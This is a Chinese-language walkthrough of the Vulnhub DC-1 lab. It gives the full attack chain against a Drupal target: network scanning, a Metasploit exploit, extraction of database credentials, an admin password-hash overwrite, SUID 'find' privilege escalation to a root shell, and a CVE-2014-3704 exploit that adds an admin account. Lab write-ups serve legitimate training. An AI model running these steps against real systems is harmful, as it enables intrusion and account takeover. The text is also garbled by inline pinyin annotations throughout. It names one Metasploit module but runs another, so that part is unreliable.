基本信息

Kali： 192.168.56.116

DC1: 192.168.56.115

實(shí)驗(yàn)過(guò)程

先在Kali中使用arp-scan進(jìn)行主機(jī)探活

sudo arp-scan --interface=eth1 192.168.56.0/24

逐個(gè)排查發(fā)現(xiàn)DC1的IP地址為192.168.56.115

然后使用nmap對(duì)主機(jī)進(jìn)行探測(cè):

nmap -sC -sV -A -oA vulnhub/DC1/DC1 192.168.56.115

主機(jī)分別開(kāi)了: 22,80,111端口

我們先從80端口入手

可以發(fā)現(xiàn)網(wǎng)站是Drupal cms管理系統(tǒng)

我們啟動(dòng)msf，搜索下Drupal可用的EXP

msf > search Drupal

這里我們選用

exploit/unix/webapp/drupal_drupalgeddon2

因?yàn)樗亲钚碌?#xff0c;而且品質(zhì)為excellent

msf6 > use exploit/unix/webapp/drupal_coder_execmsf6 exploit(unix/webapp/drupal_coder_exec) > show optionsmsf6 exploit(unix/webapp/drupal_coder_exec) > set RHOSTS 192.168.56.115msf6 exploit(unix/webapp/drupal_coder_exec) > set LHOST 192.168.56.116msf6 exploit(unix/webapp/drupal_coder_exec) > run

這樣我們就可以成功得到一個(gè)會(huì)話(huà)

我們用會(huì)話(huà)返回一個(gè)shell

發(fā)現(xiàn)flag1.txt

查看下flag1.txt內(nèi)容

給我們一個(gè)提示 Every good CMS needs a config file - and so do you.

百度drupal配置文件的位置

sites/default/files

?

里面可以看到數(shù)據(jù)庫(kù)的賬號(hào)密碼，同時(shí)我們還可以看到flag2的內(nèi)容說(shuō)：爆破不是唯一獲得訪問(wèn)權(quán)限方法

?

'database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t',

那么我們用獲得數(shù)據(jù)庫(kù)的賬號(hào)密碼登錄下數(shù)據(jù)看看

這里需要注意的是，我們需要用python轉(zhuǎn)換成標(biāo)準(zhǔn)的shell，否則就會(huì)出現(xiàn)下面的場(chǎng)景，進(jìn)入mysql之后，shell就沒(méi)有反應(yīng):

我們輸入

python -c "import pty;pty.spawn('/bin/bash')"

mysql> show database; mysql> use drupaldb; mysql> show tables; mysql> select * from users; mysql> select name,pass from users;

這里的密碼是經(jīng)過(guò)drupal加密

在scripts的文件夾中有用來(lái)算密碼的腳本，但是因?yàn)榘袡C(jī)的環(huán)境原因會(huì)報(bào)錯(cuò)。

網(wǎng)上找了下，直接用別人算好的hash進(jìn)行替換

明文：password密文：$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4

接下來(lái)我們把管理員的密碼重置下

?

mysql> update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4'where name='admin';

然后進(jìn)行登錄

然后發(fā)現(xiàn)flag3

從flag3的內(nèi)容可以看到，提示我們需要用find提權(quán)同時(shí)我們也可以在家目錄中找到flag4.

Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy. Or maybe it is?

我們使用find找下具有root權(quán)限的suid。

# -perm? 按照文件權(quán)限來(lái)查找文件

# -u=w 基于用于可寫(xiě)查找

# -type f 查找普通類(lèi)型文件

find / -perm -u=s -type f 2>/dev/null

可以看到find是可以用來(lái)提權(quán)的

我們嘗試用find執(zhí)行命令

# 這里需要注意-name參數(shù)填寫(xiě)的文件名，是需要系統(tǒng)真實(shí)存在的

www-data@DC-1:/home/flag4$ find / -name flag4 -exec "whoami" \;

那么我們接下來(lái)用find提權(quán)

www‐data@DC‐1:/home/flag4$ find / -name flag4 -exec "/bin/sh" \;

這樣我們就拿到最終的flag

額外內(nèi)容

?

使用CVE2014-3704添加管理賬號(hào)

在exploit-db中有可以直接利用的EXP，可以直接添加管理賬號(hào)地址：https://www.exploit-db.com/exploits/34992 我們?cè)贙ali上開(kāi)啟HTTP服務(wù)，讓靶機(jī)從Kali上下載EXP

然后我們通過(guò)這個(gè)EXP創(chuàng)建管理賬號(hào)

?

www‐data@DC‐1:/var/www$ python 34992.py ‐t http://192.168.56.115/ ‐u dfz ‐p ms08067

然后就可以正常登錄

另一種查詢(xún)具有root權(quán)限命令的find語(yǔ)句

find / -user root -perm -4000 -print 2>/dev/null

創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎(jiǎng)勵(lì)來(lái)咯，堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎(jiǎng)

總結(jié)

以上是生活随笔為你收集整理的【Vulnhub靶机系列】DC1的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。